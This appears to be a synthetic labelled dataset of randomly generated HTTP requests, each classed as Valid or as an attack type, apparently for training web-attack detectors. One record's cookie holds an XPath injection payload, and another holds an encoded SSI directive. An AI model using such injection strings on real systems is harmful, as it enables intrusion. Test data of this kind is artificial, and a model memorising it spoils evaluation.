If-Range: Thu, 26 Jul 07 06:58:43 UTC
Max-Forwards: 262
MIME-Version: 0.7
Pragma: ErIm2r='afmeagg'
Proxy-Authorization: Digest username="eXer"
Authorization: Digest nonce
Range: -44534,46459-4352,54-118133
Referer: /sertn/ooOSlt/ols5a.nsf
TE: deflate;q=0.9,gzip;q=0.1
Trailer: Range
User-Agent: 7yel/6.2.7.5.9
UA-CPU: x86
UA-Disp: 8850,7638,32
UA-OS: Linux
UA-Color: color16
UA-Pixels: 642x5791
Via: la3o/6.4 www.e6tAh.jpg
Transfer-Encoding: yenn; tkkhi6pt=ldrynghu
Upgrade: oaieq/9.9, Ohs/6.4, yteh4/6.6, vtnwf0/9.1, eeni/8.8
Warning: 232 www.n7dt6nol.jpg "shrpnntmcpavr" "Mon, 02 Apr 07 24:42:36 GMT"
X-Forwarded-For: 104.233.139.60
X-Serial-Number: 84617847595022
----: ------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 17996
Start - Id: 2492
class: Valid
GET /owNsW9yT2wWPBZwf8Q/76-n/untapwhmste/kaaflultpawl5taEt/ee8altien4i/wel/od.bin?xWFW9f@5Lwp-d=eq+t4&h2eor=0&seIcsrnhi=qnte8ys&eo=3%40C7TXy%40%4039&to=hD8OR&dzmeaxfeiHgHKa=0iasn7nm&ch=s6H4sZPC&tedNlEmts6enic=%5Bgroup+byi&hF=2 HTTP/1.0
Host: www.gDopt1cre.it
Connection: close
Accept: audio/x-wav;q=0.4, image/jpeg
Accept-Charset: *;q=0.6
Accept-Encoding: 
Accept-Language: *;q=0.4
Cache-Control: only-if-cached
Client-ip: 100.174.188.163
Cookie: ananetsoreooo=|;maiac=Aubl;J4tfaUc0ueogs=hN_;nei4dlrdRe=oK05x7pr;oxerc9= A
Cookie2: $Version="5"
Date: Fri, 10 Apr 09 24:54:24 CET
ETag: W/"v7wXbGXa2_39d3H2aRx"
Expect: 100-continue
From: oClUhbs@Mlm15siraR.ch
If-Modified-Since: Wed, 07 Jul 04 02:09:10 UTC
If-Unmodified-Since: Tue, 26 Jul 05 02:31:41 CET
If-Match: "Rb75wYNCbuTkFvhsCK-"
If-None-Match: *
If-Range: *
Max-Forwards: 4
MIME-Version: 6.6
Pragma: mu=ah
Proxy-Authorization: Digest response="EfC279DaFeD6E97AE1b75a78EAB78afF"
Authorization: NTLM b3JldnN5czVoNXN1aW5uSG1zbGF0aDFudGVhYXJwcmlhNWF0YXI=
Range: 0555-2,778762-,232388-
Referer: /hroEre/cyte/osest/Nmiw.mdb
TE: gzip;q=0.5,deflate;q=0.7
Trailer: Accept-Language
User-Agent: n1mccAeohu/7.0.3
UA-CPU: PowerPC
UA-Disp: 548,8459,32
UA-OS: Win98
UA-Color: color8
UA-Pixels: 301x231
Via: 3.1 107.167.152.1
Transfer-Encoding: compress
Upgrade: tig/6.9, Enn6b4/1.7, cc51/4.1
Warning: 498 158.224.222.62 "n9caasp5evdsDan" 
X-Forwarded-For: 213.191.153.150
X-Serial-Number: 347745233258688600
----: -------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 2492
Start - Id: 26844
class: Valid
GET /nrl9ootiexoiilos0/lDRjanEn/eha/nTYdRTCMAS.3B/eem60dotltdiu/uhweisld71itNtotlwe/yorsntNtantmli8trd5.sh?mdIlv=apre%24+nr%5Bl&Coqtsosfy=27lawC&rNQ=eQT&5doslqme9cw=1en&LyxA=44516&nsk62ttilhr3l=rkAZ&O4mocha@GinTVuWXO=1r&cqselr=%27tn%3D&1zaNuWevmt3mey=gniaid&nf=su0Oanas%3Fi&epupeemese=824&hk=5 HTTP/1.1
Host: 93.82.76.108
Connection: keep-alive
Accept: text/*;q=0.4
Accept-Charset: *;q=0.2
Accept-Encoding: compress
Accept-Language: o-ia, sftshtha-Oeerc;q=0.2, nLn7ap9t-ym5, hln-cgtctoh, 6Dleaa-ialedZew;q=0.4
Cache-Control: no-store
Client-ip: 52.105.65.98
Cookie: uafe=3375109
Cookie2: $Version="375"
Date: Sat, 27 Nov 04 24:19:49 UTC
ETag: "kQ2DhIHtfA0kF3cW"
Expect: narnunp=svtEad
From: vteseoi@repl.biz
If-Modified-Since: Mon, 29 Mar 10 12:04:55 CET
If-Unmodified-Since: Wed, 26 Apr 06 12:43:54 CET
If-Match: "TVJbBzCgps.vHr82GS7"
If-None-Match: *
If-Range: Sat, 11 Apr 09 17:24:25 CET
Max-Forwards: 82
MIME-Version: 8.4
Pragma: no-cache
Proxy-Authorization: NTLM ZnVuc05kbGRnSGVudmF0YjdzYmhsbmVhYXFlbTFudHRvbGpibWxrbHpwdG1FZWk=
Authorization: Digest nonce
Range: -6214
Referer: /aykQr0rn.pl
TE: trailers,chunked;q=0.2,chunked
Trailer: Accept-Encoding
User-Agent: siesmnpb (0KMm9prGUb; oBmH6gO_)
UA-CPU: StrongARM
UA-Disp: 1851,4178,16
UA-OS: Solaris
UA-Color: color32
UA-Pixels: 9604x4951
Via: nErcoo/5.4 www.sNoTf0.css, HTTP/9.2 19.85.61.30, eci/0.5 153.54.29.212
Transfer-Encoding: identity
Upgrade: advoos/2.4, 1dhv/7.1
Warning: 548 48.130.234.71:30 "gliEprlgi" 
X-Forwarded-For: 225.193.121.240
X-Serial-Number: 333154589
----: --------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 26844
Start - Id: 2896
class: Valid
GET /cND/c2D2dqO/seim/c9HTK%uoLKC/D4fClJX/mxzGY.bYU9x/c.MBycG7FErcpiX/dvnzie4jeryeNgmrr6o/xex0d/oktodiudx0iyAth/wzc/taOE@7C.asmx?zKetcK6pscriptrrXdG=9726310360&havingJCP=maildnebe&Nri=t--YUu&rh=o-FUyWstSytI&sfErnpapnoutjw=442&eseaot=5092581&opDuRmImta=ttq57hHT3R-&d3eedrjaoaf9tg0=rrcAsxt%2Boposition&ede=6945457 HTTP/1.1
Host: 81.148.165.56
Connection: asepcs
Accept: */*;q=0.7
Accept-Charset: *;q=0.4
Accept-Encoding: identity
Accept-Language: aytsdhtz-0;q=0.4, 68e-niduete;q=0.4, 2eeenio-n
Cache-Control: max-age=2
Client-ip: 247.180.237.116
Cookie: htG3SrAadOghe=16125;eeen4=toinAoOmErdlh;2bf=9853806;wltEdcsynils=n ;aRfwqeltUer=8;eez=192538
Cookie2: $Version="18"
Date: Thu, 16 Jun 05 20:13:21 GMT
ETag: "jP0fkB-UCmaOxIL.2c"
Expect: dtsf=saae
From: oDta@uengI.biz
If-Modified-Since: Thu, 06 Nov 08 03:13:13 UTC
If-Unmodified-Since: Wed, 20 May 09 06:49:02 GMT
If-Match: "8kjkRESk..YvOMB"
If-None-Match: "jRVogvWcIe2@TDx1"
If-Range: "siWH7nQ_s1Ry7@XUU"
Max-Forwards: 3778
MIME-Version: 9.1
Pragma: uc=n
Proxy-Authorization: aHELco LimsO0e=ho98
Authorization: iun8 uagit=frc5he
Range: 829113-62,080943-,925416-74
Referer: http://www.xbm6.biz/7Rdeet/adatn.mdb
TE: deflate,gzip;q=0.4,trailers
Trailer: If-Range
User-Agent: Mozilla/2.9 (X11; U; Unix 6.9; oE-8i; rv:6.4.4) Gecko/16866901
UA-CPU: Sparc
UA-Disp: 7777,5626,16
UA-OS: Win9x
UA-Color: color32
UA-Pixels: 640x6169
Via: FTP/5.0 51.9.120.40, 0.5 185.240.123.253
Transfer-Encoding: compress
Upgrade: 7I07i/0.7, ri7He/2.5
Warning: 969 www.nthaNniO.tiff "euint3iarnws" "Sat, 08 Aug 09 16:51:19 GMT"
X-Forwarded-For: 160.9.8.226
X-Serial-Number: 440914790634409640
----: ----------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 2896
Start - Id: 48444
class: XPathInjection
GET /aaGa3/sIon/._catHKEV/esrtaosye792rod/hfforjP.QYZ4/hhteozreiddrD5ba/Q@gformTq9/lAEaeietnoeineN.htm?1oy=c%3F%3A5se&c9L=8800&4gVtmpXbody8q3@=oQV7&i8epwc=%25t&NX1A=%5Bnygnaservicesre5 HTTP/1.1
Host: www.dadgsclt.st
Connection: hslt0ooo
Accept: */*;q=0.6
Accept-Charset: big5, ks_c_5601-1987;q=0.4, euc-jp;q=0.2, x-mac-turkish, x-mac-ce
Accept-Encoding: *
Accept-Language: MsAnqnsr-cWe;q=0.8, ai-o;q=0.3, esmaiw-frsqtlnn;q=0.5
Cache-Control: no-transform
Client-ip: 149.84.157.200
Cookie: tyr=nnIk;hyH8keEk9t7n=quihnll'   or    h/icrt/child::node()[processing-instruction()=872]   or  'eeAaitgu'  =  '
Cookie2: $Version="085"
Date: Sat, 29 Dec 07 23:13:36 GMT
ETag: W/"kUSTulY8V6NZDpPR"
Expect: aehiyth=1ref;rnpuReyt=b5ljiw
From: tzeeyyn@tbckkmdmi.st
If-Modified-Since: Tue, 12 Oct 04 23:54:36 UTC
If-Unmodified-Since: Fri, 24 Jun 05 22:07:28 CET
If-Match: *
If-None-Match: "B9.ahvS9byIkG3vy"
If-Range: "hkUNo-ZSptpjsz8"
Max-Forwards: 0899
MIME-Version: 9.5
Pragma: ss=hodcd5sz
Proxy-Authorization: Basic cm5sdDhhbmQ6THJ6Tg==
Authorization: 7se2m intoj5tr=nkeente
Range: 91336-,-23681,1-84677
Referer: http://Ietliwmd.uk/erdsilr/4bHmg/rhvnutdf.txt
TE: chunked;q=0.9
Trailer: Pragma
User-Agent: fsI0-Ek8bz http://www.tteh.cz
UA-Disp: 5178,273,32
UA-OS: Win95
UA-Color: color8
UA-Pixels: 348x583
Via: 8.5 61.142.72.91:0195
Transfer-Encoding: gzip
Upgrade: rtyfAi/5.9
Warning: 787 www.nspetr.htm "homtzfS" 
X-Forwarded-For: 152.33.64.46
X-Serial-Number: 30614
----: ------------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~

null

End - Id: 48444
Start - Id: 12484
class: Valid
GET /uNCj/r1TuJqU6IGiMl_9n_kpX/aA9eodepdehnen/sYokQ9sX9KpGRvIKDw2/iRo3NQTcxX7lx/qOwHs.php?ettenK=nmteya%40niTeet%3B%29&lQ=47 HTTP/1.0
Host: www.esift2e.net
Connection: rhaaeo
Accept: */*
Accept-Charset: iso-8859-7;q=0.8, iso-8859-6, euc-cn;q=0.0, iso-8859-5;q=0.8
Accept-Encoding: gzip;q=0.0, compress
Accept-Language: uutb-k;q=0.0, jhTeaasa-iadhif5E
Cache-Control: no-cache
Client-ip: 99.32.158.204
Cookie: ahlhast0eehe=5ofrresock_streamtL;angi=httoroetcEtw;dh6n0=21sxct t;l73dxaedhtzb=z64;wIusrMQK=6;ten0tnrEI=qdrls:
Cookie2: $Version="2"
Date: Sun, 26 Dec 04 19:34:29 UTC
ETag: W/"ysFV2@WM0CqMD-G"
Expect: pi5ezqee
From: a0lewqe@txeohoo.be
If-Modified-Since: Wed, 01 Jul 09 12:18:03 UTC
If-Unmodified-Since: Tue, 09 Mar 04 02:26:52 GMT
If-Match: *
If-None-Match: *
If-Range: *
Max-Forwards: 43
MIME-Version: 7.4
Pragma: br4dyg=drgtrd
Proxy-Authorization: Digest qop=ttetoa
Authorization: Basic dEFodG9lOmZlYnRrZDA5
Range: -4939,-866,-848
Referer: http://eotqip.biz/csehnlet/xasve.gif
TE: chunked
Trailer: Upgrade
User-Agent: hR5GOArYlt http://www.iehrn7.com
UA-CPU: StrongARM
UA-Disp: 1381,400,16
UA-OS: FreeBSD
UA-Color: color8
UA-Pixels: 730x939
Via: 1.9 178.206.30.118:896
Transfer-Encoding: compress
Upgrade: ach8ca/9.7
Warning: 997 139.90.117.24 "bnqtnmr9rievi" 
X-Forwarded-For: 145.136.143.164
X-Serial-Number: 863262
----: -----------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 12484
Start - Id: 39228
class: SSI
GET /F.7GngZM/lhhEdbcnstw.swf?rlfayvjasd=1&wee=%3C%21--%23echo+var%3D%22date_gmt%22--%3E HTTP/1.0
Host: 236.82.49.17
Connection: close
Accept: */*
Accept-Charset: *
Accept-Encoding: deflate, identity;q=0.6, deflate;q=0.8, identity;q=0.8, gzip
Accept-Language: ZooCh3BU-eeeiem4, sh-ottahb
Cache-Control: no-transform
Client-ip: 98.18.205.234
Cookie: cnta=m;sek=shIoa;tsNo=696943365;twttmtee5=oHe;1h7n=a~q
Cookie2: $Version="798"
Date: Wed, 20 Feb 08 22:33:57 GMT
ETag: W/"SEciDHf1YaSpWifciL1"
Expect: 100-continue
From: en6rC0@ulle.be
If-Modified-Since: Tue, 16 Jun 09 12:55:58 UTC
If-Unmodified-Since: Sun, 19 Feb 06 14:09:42 UTC
If-Match: *
If-None-Match: *
If-Range: "a93NOitfDw-biTWhFn"
Max-Forwards: 4
MIME-Version: 4.9
Pragma: ne9fops=hennlem
Proxy-Authorization: Digest nonce
Authorization: ti6m Oeyaeh=euifee
Range: 5-9725,-6683
Referer: http://itdrt.fr/sa6rNss/etnratrb/Ienrmstn/figHeO.tiff
TE: trailers,gzip;q=0.2,deflate;q=0.3
Trailer: Pragma
User-Agent: Mozilla/5.3 (X11; U; Unix 3.4; 5a-ha; rv:7.6.7) Gecko/38372919
UA-CPU: 68000
UA-Disp: 274,6270,16
UA-OS: Windows 98
UA-Color: color16
UA-Pixels: 506x400
Via: bd5/6.4 216.60.178.231, HTTP/8.9 155.67.2.10:34
Transfer-Encoding: identity
Upgrade: sjrtoN/2.4, ytwq/5.4, RmLke/9.3, citRri/1.2
Warning: 055 www.xtacnaa.shtml "uuamichbin" 
X-Forwarded-For: 252.9.253.184
----: -----------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~

null

End - Id: 39228
Start - Id: 33516
class: Valid
POST /ht9oaSiie.mspx? HTTP/1.0
Content-Length: 104
Content-Language: vao,os
Content-Encoding: gzip
Content-Location: /ueLew/riijm.tar
Content-MD5: dEJ0dHZuZHRmbFNyYWxlYQ==
Content-Type: application/x-www-form-urlencoded
Expires: Mon, 31 Jan 05 21:38:29 UTC
Last-Modified: Sun, 16 Sep 07 09:17:00 GMT
Host: 246.101.123.25:225
Connection: close
Accept: */*
Accept-Charset: *;q=0.1
Accept-Encoding: 
Accept-Language: *;q=0.0
Cache-Control: min-fresh=71
Client-ip: 168.231.168.33
Cookie: mT=snun7seioedh73;yth=68860744;tn9=ajKlYr;aouEsato=d0dskE9nmvarr %lib;llaiui=svlTahtyge5tntri
Cookie2: $Version="639"
Date: Fri, 06 Jul 07 16:51:49 UTC
ETag: W/"@ZM88zyp0XJFioX"
Expect: srrhDnn
From: Towr@gduxvle.gov
If-Modified-Since: Fri, 08 Oct 04 09:21:10 CET
If-Unmodified-Since: Thu, 02 Jul 09 05:08:08 UTC
If-Match: *
If-None-Match: *
If-Range: Mon, 06 Mar 06 12:14:39 GMT
Max-Forwards: 9041
MIME-Version: 4.5
Pragma: no-cache
Proxy-Authorization: Basic QVRheXQ4c206RWVkc2VvaA==
Authorization: bgau6 secrha=Xero
Range: 90185-
Referer: http://jdArpgh.com/eaasr/hu3nVoqu/m4ca/1noq.bin
TE: gzip,trailers
Trailer: Referer
User-Agent: Mozilla/9.7 (compatible; Konqueror/9.2; WinNT; aieOELbigh; oobsmg)
UA-Disp: 9881,7058,16
UA-OS: Mac OS X
UA-Color: color16
UA-Pixels: 565x3425
Via: HTTP/2.2 www.srmsNh1.png
Transfer-Encoding: deflate
Upgrade: gfr/9.0, vlr/1.0, ty5ayo/3.2
Warning: 800 106.149.141.106 "NeaopxsUEubt" "Mon, 14 May 07 03:31:51 GMT"
X-Serial-Number: 06516057
----: ------------------------------------------
~~~~~: ~~~~~~~~~~

maemhnti8hcnis=2703&almroshxeij=10054296&b9=099&7cXnlwtNlvy=9&hT=bA8y.@97G&EluyHude9riaH=wmase@VQr3B

End - Id: 33516
Start - Id: 5526
class: Valid
POST /7dnHeesba0/b2tdnTTsteiLmrjon/ny/spltd/ledidsay1L4S/rJA4PSL72/iorndsnkCse/v@8YvtC/iM57sMCSy@L6RwFc.jsp? HTTP/1.0
Content-Length: 175
Content-Language: excngh
Content-Encoding: compress
Content-Location: /tti5of/eeeve/ylstg2/cb8Itxc/tia8TSt.asp
Content-MD5: d3RCZW9UemRFZnN0aGFydA==
Content-Type: application/x-www-form-urlencoded
Expires: Wed, 09 Jun 04 24:41:25 GMT
Last-Modified: Wed, 08 Mar 06 21:16:44 GMT
Host: 98.61.217.154
Connection: iewult
Accept: */*;q=0.2
Accept-Charset: *
Accept-Encoding: compress;q=0.5, identity, identity
Accept-Language: osLo-s7ywneaA, p-A;q=0.1, saln-uletv0, hi-J5rE;q=0.8
Cache-Control: max-age=452
Client-ip: 19.114.67.195
Cookie: oEr=sqetc;1oirssash=am3qU;nd3ezrsp6augheH=ynrudoosmyaNet;n-Fftp=5;axnyeqstBlNt7=2ebi
Cookie2: $Version="6"
Date: Fri, 30 Apr 04 02:16:56 UTC
ETag: "V_qErrkrpRelawPe-"
Expect: t26cwr=ixeiaa
From: 6lhfnze@anRoaAa.it
If-Modified-Since: Mon, 18 Apr 05 21:35:57 GMT
If-Unmodified-Since: Wed, 24 Nov 04 09:26:30 UTC
If-Match: "S8eQbwfebtWDH-IBP4tQ"
If-None-Match: *
If-Range: "Ei4TuqLG65yfax7r7"
Max-Forwards: 2329
MIME-Version: 4.0
Pragma: isgkerj=oit
Proxy-Authorization: 6olsie eseuicop=qewzDhal
Authorization: Digest response="00A1b07DE63EebcF9cEa2dAD7BdCC3c2"
Range: 88833-,356615-47,5006-
Referer: http://aTheruk.com/ta2tdi/6fVneil.png
TE: gzip;q=0.6,trailers,trailers
Trailer: Proxy-Authorization
User-Agent: cfaSr/7.5.9
UA-CPU: x86
UA-Disp: 295,212,32
UA-OS: Windows 98
UA-Color: color32
UA-Pixels: 161x6409
Via: 9.7 www.pponor.htm, 9.6 56.22.89.219:6
Transfer-Encoding: identity
Upgrade: eps/6.2, eey/6.2
Warning: 321 www.hrctezid.js "o2Tbr6utate" 
X-Forwarded-For: 16.29.207.187
X-Serial-Number: 342559338014903
----: --------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~

gg5-samRIand=szpasswd&bdbeenolstOas=ymoehFndyj<hmhs&QaC4B8Kwpassthru0dF=etX84fFF&qfTmm9EA=sulrset&eo6nhsisynqsdk=linkyr1ibh6ort?eeo&zufhedoacv=e0d&cavrAooh1hote=4415184731

End - Id: 5526
Start - Id: 13010
class: Valid
GET /ey3v.d/bobenYhaYcopirsncrt/gPYOz1U7rFgWFx/n3/6DaXbmPKZyZqKv@/Arf/eFmloe/iGEaG/cstA8wzwaesikidoeAnn.asmx?jnl=6rptrrninclude&2No=yttl&noEchontazm=o6godq&wN@cShjJetcc=r%40hox4Bp1iB8&ltand=%5Bs%3AINftp&1gsbcrnuipb=GkfggmnaqiJta HTTP/1.1
Host: 68.209.191.2
Connection: keep-alive
Accept: image/*
Accept-Charset: *;q=0.8
Accept-Encoding: deflate;q=0.7
Accept-Language: ltw-powehec;q=0.4, dd8rlhMa-twtmrip
Cache-Control: ra=tNeir
Client-ip: 82.22.221.79
Cookie: Tabpdst8gRoet=97192737;vafaE=zodenhaoOdrmt;agnic3rews=0042;-Ehhz_R=50
Cookie2: $Version="104"
Date: Mon, 26 May 08 19:51:32 CET
ETag: "MAMexKfSFkx9OHI"
Expect: Xeaushv
From: hhrsnmqd@cyrn.com
If-Modified-Since: Tue, 30 Sep 08 22:59:05 GMT
If-Unmodified-Since: Thu, 09 Jul 09 04:54:00 UTC
If-Match: *
If-None-Match: *
If-Range: Mon, 19 Nov 07 10:06:10 GMT
Max-Forwards: 7
MIME-Version: 3.9
Pragma: no-cache
Proxy-Authorization: neu4oo ehnere3=sninoseh
Authorization: Basic c285c3Q1b2g6bW9INzBsamw=
Range: 777-8861,-671902,43-427
Referer: /tgnn9.html
TE: trailers,trailers,chunked
Trailer: Range
User-Agent: heRhwrhoy/8.8
UA-CPU: StrongARM
UA-Disp: 222,458,16
UA-OS: Win95
UA-Color: color32
UA-Pixels: 011x9947
Via: iies/4.7 www.4a8es.shtml, 9.8 www.r1me.jpg
Transfer-Encoding: gzip
Upgrade: 4aci/6.7
Warning: 278 www.2Nmfe.png "0irSv" 
X-Forwarded-For: 229.9.95.131
X-Serial-Number: 48761623
----: ---------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 13010
Start - Id: 32377
class: Valid
GET /tsUUemebot/neac3etepo/rxScCJ4F/5lupwY2mOX-a__oNyU/sH@L06BXEJR0xgBn/godmiNiaeehT/a@rLrK/mTWhomePnc3J4HhomePKe/gTp.uSJ_OknnN7kq@A/norSokwe-jCS/hOety9wnagghxot/bNUgXM1Fl-D.asp? HTTP/1.1
Host: 184.30.238.125
Connection: djoykm
Accept: audio/*;q=0.2, audio/*;q=0.2
Accept-Charset: *
Accept-Encoding: *;q=0.3
Accept-Language: it-gil2iOh;q=0.4, beeS-rms, e-pBnn, tirzenyw-ac, gsd-y;q=0.1
Cache-Control: max-stale=010
Client-ip: 230.13.38.17
Cookie: ce8enait= htacces+a;tenIrteN=ootwge;and88VbqEY=rgninNeokaeageU;Ehl=195043
Cookie2: $Version="300"
Date: Fri, 18 Nov 05 05:32:25 UTC
ETag: "bcP7TEQV0EcuH2331p"
Expect: tnihyS=onbV
From: itad@eosuny.org
If-Modified-Since: Tue, 13 Jul 04 18:11:20 UTC
If-Unmodified-Since: Sat, 08 Aug 09 02:33:37 GMT
If-Match: "1Jgr1GcEu-vRIm_2ar8"
If-None-Match: "XzNWfYu3baPG_Deu"
If-Range: Thu, 14 Oct 04 01:15:51 GMT
Max-Forwards: 4906
MIME-Version: 4.2
Pragma: no-cache
Proxy-Authorization: Digest username="dht3oq"
Authorization: Basic bjV0ZTpwak9zeQ==
Range: 36-,82952-6516,-8189
Referer: http://nilef.de/harirv.tiff
TE: gzip,deflate,trailers
Trailer: Host
User-Agent: Mozilla/5.6 (compatible; ostshluE; WinNT; Sefy24IptC; oioevna2l)
UA-Disp: 0077,169,16
UA-OS: Windows NT
UA-Color: color16
Via: 7.4 162.223.118.186:5, HTTP/4.2 77.18.7.71
Transfer-Encoding: gzip
Upgrade: ddG/8.0, tra/2.3
Warning: 626 www.8nnanJh1.js "cilEofpcabieeSl0p4hz" 
X-Forwarded-For: 130.13.184.238
X-Serial-Number: 02894265118985687
----: ---------------
~~~~~: ~~~~~~~~~~

null

End - Id: 32377
Start - Id: 32434
class: Valid
GET /b3rYwutmpbgsoundhomelinkmcg/dzbKhR.tgFhZi/l96D/yo/HMJnS_5catzV/aemharEl5rc6eeabsm6q/Dfon8lP/io5nOnht42aaunaye.htm?rnnbmaExpnhxfy=Yda&seaenordSear=iM%40nXp&oegi=8190&te=R5%40%3DAg+%3F&bisnmrpic=cb&sjee1wrIqze=816919&os4ohefcdet=oe7At2U&2mochaLqrAgYc-=+ETfsa1&a1s=lehehyxapqMnni&qsxwFa=14654&e8le=172&rvatioNia=samrmnB0o&adcoksi=aA4e HTTP/1.1
Host: www.apinq0iZE.org:944
Connection: keep-alive
Accept: audio/*, text/xml;q=0.4
Accept-Charset: gb2312;q=0.0, x-mac-arabic;q=0.5, x-mac-ce;q=0.0, euc-kr
Accept-Encoding: 
Accept-Language: *;q=0.6
Cache-Control: min-fresh=2449
Client-ip: 61.133.94.100
Cookie: mDN1UI=dBE@q1.;anod9=4726;bTjJEe=pscripto;boE=etdneUaor
Cookie2: $Version="25"
Date: Fri, 06 Apr 07 09:54:51 GMT
ETag: "tqC@JMKR_PyTjEEXyEls"
Expect: iuxhGc=9rS7mt
From: releg@syoCrleekk.net
If-Modified-Since: Fri, 02 Feb 07 15:44:41 CET
If-Unmodified-Since: Sun, 20 Mar 05 21:29:09 CET
If-Match: "NaRZR63zf6-QxzGovVw"
If-None-Match: "A2p@G-VB4Catm.WOg@"
If-Range: *
Max-Forwards: 1
MIME-Version: 9.5
Pragma: d5azjaws='migt'
Proxy-Authorization: et6l beaes2md=oil8eA1
Authorization: Basic bEh5ZWVyOjlyYnNtU25p
Range: -559,9543-
Referer: /igl2drt/Ejrpe1.cfm
TE: chunked;q=0.5,deflate;q=0.8,trailers
Trailer: Trailer
User-Agent: dPOA1-VTM http://www.ygsu.net
UA-CPU: PowerPC
UA-Disp: 339,988,16
UA-OS: Windows NT
UA-Color: color16
UA-Pixels: 5662x6161
Via: HTTP/1.6 195.96.5.7
Transfer-Encoding: compress
Upgrade: 1o0/3.7, s7dacb/4.7
Warning: 635 www.g4Aean.shtml:356 "6nfv" "Tue, 13 Mar 07 11:19:31 UTC"
X-Forwarded-For: 15.195.139.253
X-Serial-Number: 824098
----: ------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 32434
Start - Id: 20259
class: Valid
GET /JstylewlSXDwRAHqTP.mspx?qGadminYq=diopi4ugeAxol&kndeHisrtit=tZP0dheJJvZ&6giee10nHh=Ait&ncesxabllzae=+r%27So2%24n&JP-M=bHa&TsUo=nZ4Enqjy6&mutw=aupNLLMpZ&fhPl=08646499&rlosfpn4f=l&vtrsekx=tj-&efnosueeHscnr=d5xomLbahgxd2 HTTP/1.1
Host: 241.139.43.32:80
Connection: keep-alive
Accept: video/*;q=0.7, image/gif;q=0.1, audio/*;q=0.8
Accept-Charset: *;q=0.1
Accept-Encoding: compress;q=0.2, identity, gzip;q=0.8, deflate;q=0.6
Accept-Language: t-Oiappahe;q=0.3, cs-ialbji, 0acreior-igf;q=0.8
Cache-Control: max-stale=000
Client-ip: 179.205.122.247
Cookie: behmheasaed1na=9ienorui1;.dZ0GH= 5s;nCttbxrlewnav5=yeQr)maBnhtpassatmmo
Cookie2: $Version="389"
Date: Sat, 08 May 04 02:03:49 GMT
ETag: "GRSd.RAB2xqYJdR"
Expect: xoesR8=hdg4
From: eoean@ohdnpug.com
If-Modified-Since: Sun, 06 Jul 08 10:32:56 GMT
If-Unmodified-Since: Sat, 25 Mar 06 24:45:59 UTC
If-Match: *
If-None-Match: "CF3P7yBCA.4zi5d59"
If-Range: *
Max-Forwards: 540
MIME-Version: 8.3
Pragma: no-cache
Proxy-Authorization: NTLM Y25lYWFlZXJybjZHZXNkYXRzY21ld2VvZG5zOHVhaGRseGVmZWVodGd3c29lbA==
Authorization: Basic ckJ0Z1NFOmdpbm42ZQ==
Range: 90-31589,62-
Referer: /u4oD.png
TE: trailers,trailers
Trailer: Warning
User-Agent: Mozilla/3.0 (compatible; MSIE 9.7; Mac OS X; wblkk; b2chiee)
UA-CPU: MIPS
UA-Disp: 161,462,8
UA-OS: FreeBSD
UA-Color: color16
UA-Pixels: 2457x531
Via: 1.4 200.104.155.155:8, HTTP/2.4 139.161.161.130, mveei/4.3 122.178.68.152:4
Transfer-Encoding: gzip
Upgrade: eCc/4.2, tne/4.8, kdeqH/8.0
Warning: 407 www.lti8nm6y.gif "4cis0daFde" 
X-Forwarded-For: 53.85.23.141
X-Serial-Number: 11361465282
----: ---------------------------------------------
~~~~~: ~~~~~~~~~~~

null

End - Id: 20259
Start - Id: 18992
class: Valid
GET /wlXT_y/Too4i1s7i/fIbsAkonNUsnh/xss5bnBwQQKTy/u3ousF6j0Eh5fAHY4Fia/eP6R/snsu3nlGs0/an69/ewunldaoeoti/lesnpta/siasnHhsutrtlLu/ueligdUdsvda.asp?uqeydrti=2041744&mssoye8njcn=dayl+Iee&e0aerdt3a=r&seyoasten8rdAr=dcpraayo1Uhphpere&e4iqo0HohEs2nee=pzenop HTTP/1.0
Host: www.atledomt.cz
Connection: close
Accept: */*
Accept-Charset: *
Accept-Encoding: *
Accept-Language: sssm-h8E
Cache-Control: only-if-cached
Client-ip: 103.87.128.39
Cookie: nsptr=e;1UIobjectpJx8ZOy=nuoeaa6;dtirchgz=hdcQbjtdIt;0m7a=enYjed6LCe/eE;ottEa0smNRrLao5=s4Dmctmp;PZsdapngetrTi0=ledkE.B
Cookie2: $Version="10"
Date: Sat, 03 Jan 09 14:14:54 GMT
ETag: "v.fs8aP2gl-.Poow7ee2"
Expect: s0roy7=mAGvNo;ttbher=aamM
From: l14gyjst@isddra.be
If-Modified-Since: Sat, 03 Apr 04 16:00:14 GMT
If-Unmodified-Since: Mon, 18 Jun 07 18:15:28 UTC
If-Match: *
If-None-Match: "cpfriZKn5T-6yGE"
If-Range: Sat, 21 Mar 09 10:16:49 UTC
Max-Forwards: 6
MIME-Version: 9.9
Pragma: na=hor
Proxy-Authorization: Digest username="elrscge"
Authorization: NTLM bWN3b2VsZGl3aWV1bmVlY05uaXViRWZkZXNhc2hwYWEycHNkZUFMZXU=
Range: 2800-0168
Referer: /xexa.shtml
TE: trailers
Trailer: Host
User-Agent: Mozilla/3.3 (Windows; U; Windows NT 5.9; sH-ws; rv:4.0.6) Gecko/00908981
UA-CPU: 68000
UA-Disp: 2866,394,32
UA-OS: Windows 98
UA-Color: color32
UA-Pixels: 249x219
Via: 3.2 55.93.214.160:11
Transfer-Encoding: ulxe; ncrci2aa=bO5wd
Upgrade: enfzlm/9.3, RMow/0.2, Fmr1/3.8, tsi/2.4, pil2/2.5
Warning: 384 www.ihOsnx.gif:86157 "3mwtkhlueagtttZwo" 
X-Forwarded-For: 227.198.34.58
X-Serial-Number: 27260320301
----: ---------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 18992
Start - Id: 20940
class: Valid
